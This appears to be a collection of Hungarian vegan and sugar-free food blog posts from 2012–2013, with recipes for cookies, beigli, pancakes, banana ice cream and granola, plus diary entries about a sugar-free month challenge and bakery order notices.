olajos magvakból: nyersen vagy pirítva sózás nélkül: mandula, dió, mogyoró, tökmag, napraforgómag, kesudió, paradió, stb. - gabonafélék: köles, hajdina, bulgur, barnarizs, quinoa, árpagyöngy - hüvelyesek: bab, lencse - tofu Heti bontásban őszintén be fogok számolni nektek a kihívásról, a csoki utáni sóvárgásról (biztos lesz ilyen :)), az ételekről, amiket fogyasztunk és az új ízekről, amiket felfedezünk. A nyereményért folyó küzdelem feltétele, hogy amikor közzé teszem a heti beszámolókat, azok, akik részt vesznek a kihívásban őszintén írják meg a bejegyzések után kommentben a saját tapasztalataikat. Azok közül fogok választani (és nem sorsolni, tehát én döntök!), akik végigcsinálják mind a négy hetet és legalább négy kommentet írnak! Fontosnak tartom megjegyezni, hogy a témában leírtakat a saját tapasztalataimra alapozom. Ha úgy gondoljátok, hogy ti is szeretnétek kipróbálni, kérjétek ki egy szakember véleményét, tájékozódjatok a témában és saját felelősségetekre cselekedjetek. Sok sikert mindenkinek! Hajrá!

Vegán chocolate chip cookies

2013. január 8. Zizi kalandjai 

Vegán chocolate chip cookies Igen, tudom... miért nem magyarul van megadva a cím?! Valahogy így mondanám: vegán csokoládécseppes kekszek. Nem hangzik rosszul, de fura. Szerintem a chocolate chip cookies már annyira beépült a köztudatba, hogy nagyon sokan ismerik így is (még a Wikipédia is szentel neki egy külön oldalt). Ezek a kekszek is karácsonyra készültek, bevallom nekem a kedvenceim lettek az öt-hatféle változat közül. Vágytam már igazi amerikai chocolate chip cookies-ra, csak egy kicsit egészségesebb változatban, kevesebb cukorral édesítve és vegánul elkészítve. Nagyon sok recept kering az interneten, nem nehéz találni egy tutit. Vegán változat azonban kevesebb van. Én Emily receptjét vettem alapul, néhány apróságon változtattam, többek között a cukor mennyiségét csökkentettem. Amit pedig először csináltam az az, hogy a kókuszzsírt nem olvasztottam fel hozzá, hanem hagytam megpuhulni szobahőmérsékleten, így a puha kókuszzsírral kevertem ki a nádcukrot, mintha vajat használtam volna. Meg kell mondanom, hogy nagyon tetszett az élmény. A tésztájába került banán édesít rajta és kicsit puhává teszi a kisült kekszeket. Két héttel később dobozban tárolva még mindig puhák voltak. A két hét nem azt jelenti, hogy ennyire nem ízlett volna, hanem annyi süteményünk, édességünk volt az ünnepek alatt és után, hogy nem győztük I.-vel megenni őket. Apropó, cukor és édesség. Emlékeztek, hogy tavaly februárban kihívás elé állítottuk magunkat és végig csináltunk egy hardcore 25 napos cukormentes hónapot? Nos, vannak, akik már érdeklődtek nálam, hogy az idén tartanék-e újra cukor- és édességmentes hónapot, mert csatlakoznának a kihíváshoz. Ha lenne kedvetek egy ilyenben részt venni, jelezzétek itt a recept után kommentben. Még az is lehet, hogy valamilyen nyereményért csinálnátok a kihívást és jutalmat kapna a legkitartóbb a kihívás végén! ;) Na, mit szóltok hozzá? Vegán chocolate chip cookies Hozzávalók: - 120 g teljeskiörlésű tönkölyliszt - 135 g tönköly fehérliszt - 110 g nádcukor - 120 g kókuszzsír, puha állagban - 80 g ét csokibogyó/­­csokicsepp - 1 db érett banán, meghámozva, villával pépesre törve - 1 teáskanál szódabikarbóna - 1/­­2 teáskanál só - 2 evőkanál mandula/­­rizs/­­zab/­­szójatej - 1 vaníliarúd kikapart magjai Egy tálban keverjük össze a száraz hozzávalókat: lisztek, szódabikarbóna, só. Egy másik tálban keverjük ki a nádcukrot a puha kókuszzsírral (én most ezt a változatot használtam). Ha már habos a kókuszzsír, adjuk hozzá a banánpépet, a vaníliát és a növényi tejet. Jól keverjük el, majd öntsük a száraz hozzávalókhoz. Adjuk hozzá a csokoládét és keverjük át a tésztát (puha, enyhén ragacsos, de jól formázható tésztát kell kapnunk). Melegítsük elő a sütőt 180C fokra és béleljünk ki egy nagy tepsit sütőpapírral. Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra és egy kicsit lapítsuk le a tetejüket. 15-20 percig süssük, amíg aranybarnák lesznek. Ebből a mennyiségből kb. 25 db lesz.

Beigli torta - Tej,-tojás,-cukor,-élesztőmentes

2012. december 21. Fittanyuka Blog 

Beigli torta - Tej,-tojás,-cukor,-élesztőmentes Karácsony elképzelhetetlen beigli nélkül, igazi hungarikum. A Karácsonyi Fittanyuka főzőtanfolyamon készítettük el. Az alábbi változat, mondhatni kettő az egyben, ugyanis egy sütéssel rögtön kétféle ízben készítjük ez a finomságot. Nincs repedés, hasadás, mint általában a beigli sütésnél. Különlegessége ennek a beiglinek, hogy minden szempontból megfelel a nem savasító sütik kritériumainak. Nincs benne élesztő, cukor és semmi tej,-tojás. Így bátran elkészítheti és fogyaszthatja az is aki cukorbeteg, candidás, vagy lúgosítani szeretne , de azért karácsonykor nem szívesen hagyja ki a beiglit! Hozzávalók: Tészta: 430 g világos tönköly liszt 200 g nem hidrogénezett bio margarin 40 g nyírfa cukor 1,2 dl víz vagy növényi tej 1 zacskó foszfát mentes sütőpor 1 csipet só Dió töltelék: 300 g darált dió 80 g nyírfa cukor 1 db narancs reszelt héja és leve 1 dl növényi tej 3 evőkanál cukormentes sárgabarack lekvár 1kk alma sűrítmény 1 kk vanília kivonat Mák töltelék: 300 g darált mák 80 g nyírfa cukor 30 g áztatott mazsola 1/­­2 citrom leve és héja 2 db reszelt alma 1 dl növényi tej kk vanília kivonat Puding krém ( elhagyható) 1 tasak vaníliás bio puding por 1 evőkanál nyírfa cukor 300 ml növényi tej Torta lekenéséhez: 4 evőkanál növényi tejszín, 2-3 evőkanál méz vagy agave szirup. Először elkészítjük egyenként a töltelékeket.  A darált diót a hozzávalókkal ( kivéve a lekvár), összekeverjük és lassú tűzön főzni kezdjük, állandó kavarás mellett. Amikor felrottyant, félre húzzuk és hozzá keverjük a lekvárt. Majd hűlni hagyjuk. A mák tölteléknél szintén összekeverjük a hozzávalókat ( kivéve az almák )és lassú tűzön, állandó kavarás mellett főzzük.  Az almákat lereszeljük nagy lyukú reszelőn és utólag hozzákeverjük a töltelékhez, majd hűlni hagyjuk. A puding krém készítésénél a port először csomómentesen elkeverjük a növényi tejjel és utána hagyományos módon elkészítjük a pudingot.  Fontos, hogy ne legyen túlságosan híg. Amíg hűlnek a krémek összegyúrjuk a tésztát. Először a száraz, majd a nedves hozzávalókkal keverjük össze és kézzel, vagy robotgéppel alaposan összedolgozzuk a tésztát. A hűtőben fél egy órát pihentetjük. Miután kivettük a hűtőből még egyszer alaposan összegyúrjuk kézzel a tésztát és kettő , kb. 0,5-1 cm vastagságú lapot nyújtunk ki belőle. Egy 26 cm-es átmérőjű torta forma segítségével két alapot szúrunk ki a tésztából. Az egyik az alja lesz, a másik a teteje. Az alját belehelyezzük a kapcsos torta formába, megszúrkáljuk egy villa segítségével. A forma oldalát is körbe bevonjuk tésztával, kézzel összedolgozzuk a torta alját az oldalával. Megtöltjük a töltelékekkel. Körbe csiga formában rakjuk a töltelékeket, vagy készíthetjük fele-fele arányban is megosztva a tortát a kétféle töltelékkel. Én a csiga formát választottam, így egy szeletben mind a három töltelék szerepel. Körbe ragjuk tetszőlegesen a diót vagy a mákot, utána következhet a dió vagy puding, vagy megcserélve, kinek mi a szimpatikus. A torta tetejét kiszúrtam fenyő mintájú süti kiszúróval és így helyeztem rá a lapot torta tetejére. Oldalát kézzel összedolgozzuk. A kivágott fenyő mintákkal díszítettem a fedő lapot. Majd növényi tejszínt elkeverünk mézzel, vagy agave sziruppal és ezzel kenjük le a tortát, hogy szép fénye legyen. Előmelegített sütőben 180 C fokon 25-30 percig sütjük. A torta ötletét itt találtam, amit természetesen megreformáltam!   Fittanyuka

Nyers vegán bejgli-mánia! Raw vegan beigli!

2012. december 4. Répa Konyha 

Nyers vegán bejgli-mánia! Raw vegan beigli! Szóóóval, ma megérkeztek az idei első bejgliszeletek az ÉletKonyhától! Egyenlőre a BioABC-ben találjátok meg őket. Nyers vegán, glutén és cukormentes! Nekem a diós a kedvencem! Rendelj tőlünk közvetlenül! Karácsonyi rendelést felveszünk az info@eletkonyha.hu-n! Our gluten- and sugarfree Christmas goodies arrived! Order yours for Christmas at info@eletkonyha.hu DIÓS BEJGLI/­­Hungarian Beigli with walnut dió, méz, citromhéj*, narancshéj*, hajdina, mazsola* walnut, honey, lemon peel *, orange peel*, sprouted buckwheat, raisins * MÁKOS BEJGLI/­­ Hungarian beigli with poppyseed mák, mazsola*, citromhéj*,-lé*, hajdina, dió poppy seeds, raisins *, lemon*, sprouted buckwheat, walnuts 2970 Ft/­­300g

Ünnepi Fittanyuka sütemény rendelésfelvétel

2012. november 29. Fittanyuka Blog 

Ünnepi Fittanyuka sütemény rendelésfelvételKedves Megrendelőink! Akik szeretnének egészséges, ünnepi süteményeket az idei ünnepekre is, mai naptól már leadhatják karácsonyi rendeléseiket egészen december 20.-ig! Szeretnénk mindenkit kiszolgálni 100%-osan.  Karácsonyi ízelítő: bejglik, aprósütemények, kalács, kuglóf, zserbó, sós sütemények, stb. Rendelhetőek GLUTÉN,- TEJ - TOJÁS - CUKORMENTESEN!  A sütemények az ország  egész területéről rendelhetőek, kiszállíttatjuk! Fittanyuka

Vegán fűszeres répás palacsinta meleg fahéjas mézzel

2012. október 18. Zizi kalandjai 

Vegán fűszeres répás palacsinta meleg fahéjas mézzel Habos mandulatej Az élet néha keresztül húzza a számításainkat és nem úgy alakulnak a dolgaink, ahogyan azt elterveztük. Az évszakok megváltoznak, ahogyan a helyszínek is. Emberek megjelennek az életünkben, aztán néhányan elmennek. De megnyugtató tudni, hogy akiket igazán szeretünk, azok örökre a szívünkben maradnak. Szerettem volna sütni csokis sütőtökös vegán palacsintát magamnak a szülinapomra, meg vegán banános csokitortát is. Aztán úgy hozta az élet, hogy nem volt erre lehetőségem és időm se, így majd néhány héten belül, ha lesz egy szabad hétvégém, nekiállok alkotni. De a finom recept nem marad el. Sütőtökös palacsinta helyett répásat hoztam. Ráadásul cukormenteset és vegánt. A répa enyhén megédesíti. Azért a bűnözés megvolt, ugyanis meleg fahéjas mézzel öntöttem nyakon. Az utóbbi időben, ha ilyen vastag palacsintákat sütök, mindig kihagyom a receptből a tojást és a tejterméket. Kiváló egy palacsinta, ha vegán, akkor is. Puha, dundi, falnivaló. Kényeztető vasárnapi reggeli hűvös őszi reggeleken. Vegán fűszeres répás palacsinta meleg fahéjas mézzel Hozzávalók 8-10 db-hoz: - 1 bögre hajdinaliszt - 1/­­4 bögre teljeskiörlésű tönkölyliszt - 1/­­4 bögre őrölt mandula - 1 és 1/­­2 evőkanál foszfátmentes sütőpor - 1/­­4 teáskanál őrölt gyömbér - 1/­­4 teáskanál őrölt szerecsendió - 1/­­8 teáskanál őrölt kardamom - 1 és 1/­­2 bögre mandulatej (zabtej, rizstej is használható) - 1 bögre reszelt répa - 2 evőkanál kókuszolaj vagy napraforgó olaj + egy kevés a sütéshez - 1/­­3 bögre méz - 1 teáskanál fahéj Egy tálban keverjük össze a száraz hozzávalókat: lisztek, mandula, sütőpor, gyömbér, szerecsendió és kardamom. Egy másikban pedig a nedves hozzávalókat: mandulatej, kókuszolaj és reszelt répa. Öntsük a nedves hozzávalókat a szárazhoz és keverjük addig, amíg sima, sűrű tésztát kapunk (ha túl sűrűnek találjuk, hígítsuk egy kevés mandulatejjel). Hagyjuk 5 percet állni, hogy a tészta megkeljen. Tegyünk egy kevés kókuszzsírt a teflonserpenyőbe és forrósítsuk fel. Kisebb adagot kanalazunk (2 adag is mehet egyszerre) a palacsinta tésztából a serpenyőbe, közepes lángon sütjük az egyik oldalukat, amíg aranybarnák lesznek. Megfordítjuk és a másik oldalukon is sütjük 1-2 percig.  Közben egy kis lábasban melegítsük fel a mézet, adjuk hozzá a fahéjat és jól keverjük el. Locsoljuk meg a fahéjas meleg mézzel a palacsintákat és tálaljuk azonnal.

Nyers vegán cukormentes banán fagylalt

2012. augusztus 30. Zizi kalandjai 

Nyers vegán cukormentes banán fagylalt Ismertem már ezt a fagylalt készítési módszert, de mégsem csináltam soha. Múlt héten a barátnőm, Emiko átküldte nekem ezt a linket, hogy amikor megtalálta, rám gondolt (tudja, hogy szeretem a vegán, cukormentes desszerteket). Annyira egyszerű, hogy le sem írom külön a receptet. Csak érett banán kell hozzá, aztán mélyhűtő, majd egy erős konyhai robotgép. Én 3 darab banánt használtam, ez 2-3 főre elegendő fagylaltot fog eredményezni. A banánt hámozzuk meg és vágjunk kb. 1-2 centiméter vastag szeleteket belőle. Tegyük egy tányérra úgy, hogy minden szelet külön-külön legyen (ne legyenek egymáson), majd tegyük be a mélyhűtőbe 2-3 órára. A megfagyott banánszeleteket tegyük a robotgépbe és kapcsoljuk be. Először hangos lesz, meg mozogni fog a robotgép (valahogy kezelni kell a fagyott darabkákat), de néhány perc múlva fagyottá áll össze az egész. Ha még 3-4 percig dolgoztatjuk a robotgépet az egész krémes lesz. Ez a cukormentes vegán nyers banán fagylalt titka, amely kisbabák első fagylaltja is lehet. Természetesen adhatunk hozzá vaníliát, keverhetünk bele pirított mandulát vagy csokoládé darabkákat. Az eredmény: mennyei! A fent említett cikkben le van írva a tudományos magyarázata annak, hogy a banán hogyan képes ilyen könnyen fagylaltá válni (a magas pektin tartalmára gyanakodnak). A lényeg, aki még nem próbálta, ne hagyja ki! :)

Banános földimogyoróvajas jégkrém

2012. július 20. Zizi kalandjai 

Banános földimogyoróvajas jégkrém Szerdán a délutáni szundiból ébredve beugrott a banán-földimogyoróvaj-kakaó édes hármasa. Nem tudom hogyan, és azt se, hogy miért erre ébredtem, de tudtam, hogy cselekednem kell. :) Volt három darab nagyon érett (már bebarnult héjú) banánunk a hűtőben (nyáron érdemes a már túlérett banánokat berakni a hűtőbe, így tovább elállnak és kiváló fagylalt alapanyagunk lesz belőle). Kettőt gyorsan bedobtam a robotgépbe, a többi alapanyagot találomra kimértem, hozzáadtam a banánhoz és bekapcsoltam a gépet. Néhány perc múlva valami nagyon finom nyalánkságot kaptam. Ehetjük egyből, vagy egy kicsit behűtve, majd poharakban tálalva és pirított földimogyoróval megszórva. Én azonban formába öntöttem és lefagyasztottam. Így lett egy krémes, egyszerű, cukormentes, vegán jégkrémünk vacsora utánra. (Földimogyoróvajat készíthetünk mi magunk is otthon, íme egy recept hozzá.) Krémként baba desszertnek is el tudom képzelni vagy váratlanul beugró vendégeknek is tálalhatjuk. Csodás hétvégét mindenkinek! Banános földimogyoróvajas jégkrém Hozzávalók 4 db jégkrémhez: - 2 db érett banán, hámozva, felkarikázva - 80 g földimogyoróvaj - 80 ml zabtej - 2 evőkanál kakaó Tegyük a robotgépbe az összes hozzávalót és pürésítsük simára. Öntsük a krémet formákba, helyezzünk mindegyikbe pálcikát és tegyük a mélyhűtőbe legalább 2 órára, amíg megszilárdulnak. Egyértelmű a jégkrém mánia a blogomon, ugye? :)

Gyerekzsúr Egészségesen

2012. június 8. Fittanyuka Blog 

Gyerekzsúr Egészségesen A múlt héten Vikike 5-ik szülinapját tartottuk. Ilyenkor mindig legalább annyira izgulok, mint ő, mert hetekig a szülinapról beszélünk, előtte és utána is!  Ő nagyon várja, tervezgeti, meghívja a kis ovis társakat.., én pedig a zsúr asztalt tervezgetem:)! Mint anya mondom nem egyszerű ( és itt maximálisan együttérzek a többi anyukával), hogy a finomságok amit kínálunk a kicsiknek ne csak egészségesek legyenek, de finomak is ,vagy fordítva is mondhatnám: ne csak finom, hanem egészséges is legyen! Azt tudom, hogy mit szeret a gyerekem, de vajon a többi is szívesen elfogyasztja? Viki alapvetően úgy táplálkozik ahogy én. Nem eszik húst, tejet, tojást ( érzékeny is rá), adalékokat, cukrot, finomított élelmiszereket. Mind amellett egy nagyon jó étvágyú, édesszájú kislány. Tiltani nem szoktam neki ételeket, inkább elmondom, hogy mi - miért van és miért esszük úgy ahogy esszük. Ha megkínálják tudja, hogy megkóstolhatja amit kínálnak neki. 5  évesen már magától mondja, hogy ő nem szereti a szúrós italokat ( szénsavas). Elmondja, hogy az állatok az ő barátai és nem eszi meg őket, a rejtett cukrot azért nem tudja megkülönböztetni, erre nekem kell odafigyelni. Azt vallom, hogy nem tiltani kell a gyerekeket, mert az szorongást vált ki, hanem saját példán keresztül tanítani, mert ők úgyis azt akarják másolni amit mi csinálunk ( ez mindenben így van). Viszont a példamutatást-tanítást nem elég elég korán kezdeni. Többször tapasztalom, hogy anyukák panaszolják, hogy nem tud mit tenni, ugyanis  a gyereke nem issza meg a növényi tejeket, a sima vizet stb., a legjobb igyekezete ellenére sem. Ne feledjük, hogy mi ismertettük meg a gyerekkel a kólát, a cukrot, stb. Ilyenkor már nehezebb a dolga az anyáknak. Az agresszív ételek, ízek szinte érzéstelenné teszik az ízlelést. A legagresszívabb a konyhasó, fehér cukor, ízfokozók, adalékok. Tudom van a közösség, az óvoda, iskola, de mindig az otthoni minta a legerőteljesebb. Ebben nekünk anyáknak van a legnagyobb felelősségünk! Én a következőképpen állok hozzá: tanítom saját példámon keresztül, és bízom benne, az ő ítélő képességében, hogy amikor nagyobb lesz úgy tudjon dönteni ami neki a legjobb! Visszakanyarodva az zsúr asztalhoz: A favorit egy uzsonna sütemény volt: a Krumplis hajtogatott, amit kapros túróval töltöttem meg. Második helyen a Csokis almás muffin állt, utána az eper következett. Utólag visszagondolva nem javaslom a csokis epret ha féltjük a bútorokat, kárpitokat:) Ezen kívül tálaltam alma chipszet, kitűnő alternatíva a hagyományos chipsek helyett, amit imádtak, volt a tönköly lisztből készült magos - sós rúd, fittanyuka süti -ből. Italok közül a gyömbéres limonádé fogyott , nem csináltam erősre, mert a gyömbér karakteres ízű. Barbi ruhája: tej,-tojás,-adalék és cukormentes eper torta. www.fittanyukasuti.hu kérésre. Az abszolút favorit pedig a almás-barackos cukor,-adalék mentes kölyök pezsgő volt és az általam kreált Barbi torta, ami Viki kívánsága volt. Receptek: Csokis Almás muffin  - zabpehellyel Recept: Itt! Étcsokoládéba mártott Eper Recept: Itt! Krumplis hajtogatott kapros túróval Recept: Itt! Ajánlom még az apró sütiket, amelyek nem morzsálódnak annyira, elfér a kis kezükben és még finomak is. Egyik ilyen a Sokmagos Zabkeksz . Recept Itt! ..vagy a narancsos amaránt golyók, Recept Itt! Fittanyuka - Lúgosító ételek a facebookon Fittanyuka

Szuper reggeli: Zabpehely rizstejjel és pirított mandulával + a negyedik hét cukor nélkül

2012. február 29. Zizi kalandjai 

Szuper reggeli: Zabpehely rizstejjel és pirított mandulával + a negyedik hét cukor nélkülHát ide is eljutottunk... a végére! A cím nem teljesen pontos, ugyanis a negyedik hetet csak félig csináltuk végig.  Február 25-én a délelőtti órákban, 25 kemény nap után véget ért a kihívás. A 24. napon este rám tört az édesség utáni vágy elég erősen, ezért úgy döntöttem, hogy másnap megállítom a folyamatot és nem kínzom magam tovább. Befejeztük. Elég volt most ennyi. A böjt ezzel lett megtörve... habos cappuccinoval és egy alig érezhetően édes croissant-nal. Elfogyasztásuknak minden pillanatát élveztük I.-vel. Néhány hónapja szokásunkká vált, hogy a szombati piac után megiszunk egy pöti káfét vagy cappuccinot és eszünk hozzá egy croissant-t. Múlt szombaton úgy döntöttünk, hogy teszteljük a Villa Bagatelle kistesóját, a Bagatellinit. Rengeteg ropogós, finom kenyér, pékáru, szendvics, saláta, frissen facsart narancslé készül náluk, mi azonban maradtunk a hőn áhított egyszerű reggelinknél. A cukormentesség feloldására kiváló volt. A Bagatellinivel egy olyan kávézót és pékséget hoztak létre, ahol minden elsőrangú minőségű, természetes vagy bio alapanyagokból készül, és amelyben a kávékülönlegességekről a kiváló minőségéről ismert, bécsi Daniel Moser gondoskodik. A legapróbb részletekre is figyeltek a design kialakítása során, egységes hangulatot tükröznek a fehér bútorok, a csodás fehér csempe a falon, a fehér színű kiszolgálópult és a fehér KitchenAid is. Rengeteg recept készült még a cukormentes vegán hónap alatt, ezeket folyamatosan megosztom majd veletek itt a blogon. Lesz külön bejegyzés az alternatív édesítőszerekről is. Most pedig a konklúzió... Megérte-e 25 napig teljesen cukor és édesség mentesen élni? A válaszom egyértelműen igen. Türelemre tanított, figyeltem a testem működését. Bármennyire is kívántam az édességet az mindig csak néhány pillanatig tartott, majd beleástam magam valamibe és már nem is hiányzott. Úgy éreztük mindketten, kellett a testünknek egy ilyen fajta tisztulás és egyelőre azt gondoljuk, hogy jövő februárban meg fogjuk ismételni. A cél az volt, hogy ezután kevesebb édeset együnk. Reméljük ezt sikerül megtartanunk. Ha túl sok lesz az édesség recept a blogon, nyugodtan szóljatok rám. Íme egy cukormentes, gyors, könnyen elkészíthető reggeli recept, amely tápláló és még a hétköznapi  reggeli rohanásba is belefér az elkészítése és az elfogyasztása. A rizstej édeskés íze miatt egyáltalán nem szükséges édesíteni. Ha mégsem férünk a bőrünkbe, adjunk hozzá 2 teáskanál mézet. Zabpehely rizstejjel és pirított mandulával Hozzávalók 2 főre: - 10 evőkanál zabpehely - 400 ml rizstej (natúr, édesítetlen) - 1 kis marék mandula - fahéj A mandulát száraz serpenyőben 6-8 perc alatt pirítsuk meg. Ha kihűlt aprítsuk durvára. A rizstejet langyosítsuk fel egy lábasban. Osszuk el egyenlően a zabpelyhet tálkákban, öntsük rájuk a rizstejet, szórjuk meg fahéjjal, majd a pirított mandulával. További cukormentes vegán receptekért katt ide.

Szuper reggeli: Cukormentes fahéjas granola

2012. február 20. Zizi kalandjai 

Szuper reggeli: Cukormentes fahéjas granola Folytatódik a szuper reggeli sorozat egy szintén egyszerű, 20 perc alatt elkészíthető finomsággal, a granolával. A granolát többnyire reggelire fogyasztják, de nasiként is megállja helyét (sőt ajánlott az egészségtelen snack food helyett).  Alapját a zabpehely, olajos magvak és valamilyen édesítőszer képezik, adhatunk hozzá aszalt gyümölcsöket,  jó minőségű csokoládét, megszórhatjuk kakaóval vagy kókuszreszelékkel... szóval rengeteg variánsa van. Az üzletekben kapható változatok többnyire édesítve vannak, ezért érdemes elkészíteni a saját házi verziónkat és így mi kontrolláljuk azt, hogy miből mennyi kerüljön bele. Nem beszélve arról, hogy a házi verzió olcsóbb. Üvegbe zárva hűvös helyen eláll 5-8 napig, de szerintem hamarabb el fog fogyni. A kihívás hónapjában természetesen cukormentes verziót készítettem. Az aranybarnára pirított magokat rizstejjel öntöttük fel, amely magában is édeskés ízű. Ha valaki mindenképpen szeretné édesebbé tenni,  adjon hozzá 1-2 evőkanál mézet, nádcukrot vagy juharszirupot. Az elkészült granolát összekeverhetjük joghurttal, tejjel, egyéb növényi tejekkel vagy friss gyümölcsökkel is. A recept ötlete Maria-tól származik, akinek rengeteg inspiráló vegán és cukormentes receptje van. Sok mindent készítettem már a blogján található receptek közül. Cukormentes fahéjas granola Hozzávalók 2 főre: - 70 g dió - 30 g kesudió - 30 g mandula - 70 g kókusz chips - 20 g chia mag (lenmag vagy szezámmag is használható helyette) - 20 g kókuszolaj (vaj is használható helyette) - 1 teáskanál fahéj Melegítsük elő a sütőt 120C fokra. Egy tálban keverjük össze az összes hozzávalót, majd egyenletesen öntsük rá egy sütőpapírral bélelt tepsire. Süssük 10-15 percig, amíg a magok aranybarnára pirulnak. Félidőben egy kanállal keverjük át, hogy egyenletesen megsüljön. További cukormentes vegán receptekért katt ide. *** Cukormentes olvasnivalók :) William Dufty: Cukor blues (Kétezeregy Kiadó) Vitaminsziget: Fehér méreg: a cukor Chrash Test Mummy: 5 Reasons Why I Wont Take Sugar Back Sarah Wilson: I Quit Sugar The New York Times: Is Sugar Toxic?

Udon tészta pirított leveleskellel és tofuval krémes citromos tahini szószban + az első hét cukor nélkül

2012. február 12. Zizi kalandjai 

Udon tészta pirított leveleskellel és tofuval krémes citromos tahini szószban + az első hét cukor nélkül A könyvek, amelyeket mostanában gyakran forgatok... Igaz már a második hetet tapossuk a cukor és mindenféle édesség, édes sütemény, csokoládé mentes februárban, de az első hét összefoglalójával még csak most jelentkezem. Az első héten ebéd és vacsora után is nagyon hiányzott valami édes. Csak egy kocka csoki, egy falat sütemény és már jobban lennék - gondoltam. Ekkor jöttem rá, hogy a cukor, a csoki ugyanolyan drogok, mint az alkohol vagy bármilyen drog fajta. Enyhe elvonási tünetek jelentkeznek, ha nem kapjuk meg a napi adagunkat. Már-már remegünk azért az egyetlen kocka csokiért, ugye? Eddig is címke-olvasós vásárló voltam, de ezúttal még inkább. Most csak a sós nasik jöhetnek szóba, ezért még figyelmesebben elolvasom a címkéket, hogy tényleg olyat vegyek, amiben nincsen cukor. Például nagy ritkán megkívánom a ropit. Ha elolvasom a hozzávalókat, inkább vissza szoktam tenni a polcra és nem veszem meg. Kivétel ez alól a tönköly ropi, azonban tartalmaz nádcukrot, így ebben a hónapban ez most nem jöhet szóba nasiként. Helyette nagyon sok olajos magot (főleg mandulát, diót, mogyorót, brazil diót, kesudiót) nyersen/­­pirítva fogyasztunk vagy leveleskel chipset. Ha nagyon az édes ízre vágyunk, akkor almát, narancsot vagy mandarint eszünk, de a kipréselt cékla-és répalének is elég édes az íze, hogy csillapítsa az édes íz utáni vágyunkat. A csoki éhségünket kakaóval csillapítjuk, egy 10 perc alatt összedobható nasival: egy maréknyi mandulát vagy mogyorót száraz serpenyőben megpirítok, ledarálom, összekeverem egy kevés kókuszolajjal és kakaóporral, majd berakom a fagyasztóba 8-10 percre, hogy megdermedjen egy kicsit. Elkanalazgatva filmnézés közben egészen kiváló. A pirított mandula isteni finom, a kakaó a csokira emlékeztet, csak ez az egész krém nem édes. Ha adnánk hozzá 1 evőkanál mézet, még akkor is az egészséges édesség kategóriába sorolnám. :) Hát így telnek a napjaink cukor nélkül. Nem könnyű, de túlélhető. A következő heti beszámolóban írni fogok egy édesség csábító eseményről. Kiálltam a próbát vagy nem? :) Most pedig jöjjön egy vegán recept, amit már harmadjára készítettem, mert annyira bejött nekünk. Fél óra alatt összedobható, szóval hétköznapi gyors vacsoraként is megállja a helyét. Udon tészta helyett használhatunk soba tésztát, rizstésztát, de akár spagettit is. Udon tészta pirított leveleskellel és tofuval krémes citromos tahini szószban Hozzávalók 2 főre: - 200 g udon tészta - 300 g tofu, felkockázva - 1 csokor leveles kel, kisebb darabokra tépkedve - 3 gerezd fokhagyma - 1 teáskanál chili pehely - 4 evőkanál tahini (szezámmag krém) - 2 teáskanál szójaszósz - 1 citrom kifacsart leve - só, bors - kókuszolaj (napraforgó olaj is használható) Melegítsük elő a sütőt 180 fokra. A kockára vágott tofut tegyük sütőpapírral bélelt tepsire, sózzuk, borsozzuk és locsoljuk meg 2 teáskanál kókuszolajjal. Pirítsuk aranybarnára a kis kockákat kb. 20 perc alatt (alkalmanként keverjük át, hogy minden oldalukon jól megpiruljanak). A tésztát enyhén sós, lobogó vízben a tasakon található utasítás szerint főzzük meg, szűrjük le és tegyük félre. Közben egy serpenyőben hevítsünk 2 teáskanál kókuszolajat, adjuk hozzá a fokhagymát, a chili pelyhet, majd 1 perc múlva a leveleskelt és 10 perc alatt pirítsuk enyhén ropogósra. Egy tálkában keverjük össze a tahinit a citromlével és a szójaszósszal, majd ezt a keveréket öntsük a megfőtt udon tésztára. Keverjük hozzá a leveleskelt. Szedjük tálkákba és tegyünk a tetejére a pirított tofu kockákból. További cukormentes vegán receptekért katt ide.

Szuper reggeli: Fűszeres sütőtök mandulatej turmix

2012. február 7. Zizi kalandjai 

Szuper reggeli: Fűszeres sütőtök mandulatej turmix A szuper reggeli alatt azt értem, amit az angol nyelvben superfood alatt értenek, vagyis olyan élelmiszert, ételt, amelyek magas koncentrációban tartalmaznak olyan alapvető tápanyagokat, amelyeknek az egészségre gyakorolt hatása kiváló.  Hétköznap minden reggel valamilyen általunk készített turmixot iszunk reggelire. Télen ez többnyire kimerül a grapefruit-citrom-víz (esetleg egy kis méz) vagy alma-víz kombinációban, de gyakori reggeli a zöld turmix is és ennek variációi, csak nem mángolddal, hanem leveles kellel. Nyáron aztán a szezonnak megfelelően lehet turmixunkat variálni mindenféle gyümölccsel. Mivel februárban kihívás elé állítottuk magunkat és nem eszünk semmilyen cukrot (mézet, agavé/­­rizs/­­juharszirupot, stb.), édességet, süteményt, ezért úgy gondoltuk, hogy a reggelit egy kicsit táplálóbbá tesszük. Az elmúlt napokban készült néhány szuper reggeli a konyhámban, vagyis olyan étel vagy ital, amely nem tartalmaz cukrot - ráadásul vegán is -, mégis sok bennük a tápanyag. Többen kértétek, hogy írjak a kihívásról és osszam meg azokat a recepteket, amelyeket kipróbálok, hogy a tavaszi tisztítókúrához ötleteket tudjatok gyűjteni. Ez a reggeli már ennek a hónapnak a termése. Elkészítéséhez mandulatejet használtam, ami bármilyen más növényi tejjel (rizstej, zabtej, szójatej, quinoa tej, stb.) helyettesíthető, csak egy a fontos! Vásárláskor nézzük meg, hogy nincs-e benne hozzáadott cukor. Néhány hete vettem észre, amikor nem a megszokott helyen vettem zabtejet. Egy másik márkát találtam az üzlet polcán és jobban szemügyre véve az összetevőket, észrevettem, hogy a natúr, ízesítetlen zabtejhez sajnos adtak nádcukrot (inkább szójatejet vettem, amiben nem volt semmi csak szója és víz). A zabtej, rizstej cukor nélkül, önmagukban is édeskés ízűek, így nincs szükségük édesítésre! Holnap jövök az első heti beszámolóval, most pedig íme a recept. Fűszeres sütőtök mandulatej turmix Hozzávalók 2 főre: - 500 ml mandulatej - 12 teáskanál sült sütőtök püré - 2 teáskanál fahéj A hozzávalókat tegyük a turmixgépbe, turmixoljuk 5 percig. Ha túl sűrűnek találjuk, hígítsuk még egy kevés mandulatejjel. További cukormentes vegán receptekért katt ide.

A legegészségesebb chips és a februári kihívás

2012. február 1. Zizi kalandjai 

